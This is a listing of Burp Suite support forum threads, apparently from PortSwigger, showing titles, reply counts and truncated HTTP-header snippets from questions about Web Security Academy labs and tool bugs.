Last updated: Jul 05, 2023 08:58AM UTC | 5 Agent replies | 5 Community replies | Bug Reports

Lab: CSRF where token is not tied to user session

https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email Content-Type: application/x-www-form-urlencoded

Last updated: Jun 08, 2020 09:04AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

how do we calculate value for tranfer encoding??

username=carlos HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length

Last updated: Feb 02, 2022 11:53AM UTC | 2 Agent replies | 2 Community replies | How do I?

I forget the user name and passsword while installation of burp Enterprise Edition

I had install burp enterprise edition , i have not choose any enterprise Database engine and choose the

Last updated: Sep 18, 2019 08:16AM UTC | 1 Agent replies | 0 Community replies | How do I?

Upload File to Burp Collaborator

Hi, It looks like you are trying to achieve what is described in the articles below: - https://www

Last updated: May 14, 2020 12:27PM UTC | 1 Agent replies | 0 Community replies | How do I?

multiple request headers in burpsuite community edition v2023.7.2

Cookie: session=8aVCM2qExzt0Y2t1AJ4WhRIKozqAYedJ Connection: keep-alive Content-Type: application/x-www-form-urlencoded

Last updated: May 25, 2024 06:30AM UTC | 4 Agent replies | 5 Community replies | How do I?

Username enumeration via response timing

0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded 0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded

Last updated: Aug 15, 2024 07:15AM UTC | 6 Agent replies | 5 Community replies | How do I?

Fails to capture Location HTTP header field

redirections where necessary (as described here https://portswigger.net/burp/help/scanner_options.html#engine

Last updated: Jun 13, 2016 01:39PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab: HTTP request smuggling, basic CL.TE vulnerability

Connection: keep-alive Content-Length: 10 Transer-Encoding: chunked Content-Type: application/x-www-form-urlencoded

Last updated: Jan 12, 2021 08:22AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: CL-TE request smuggling lab is not working with the official solution.

0ac000af04eed935c3233d650017001f.web-security-academy.net Connection: keep-alive Content-Type: application/x-www-form-urlencoded

Last updated: Mar 15, 2023 05:08AM UTC | 2 Agent replies | 3 Community replies | Bug Reports

Burp cant handle same-name cookies set to different paths

option to "move up" "move down" i think that would solve the problem, or ultimately, the session rules engine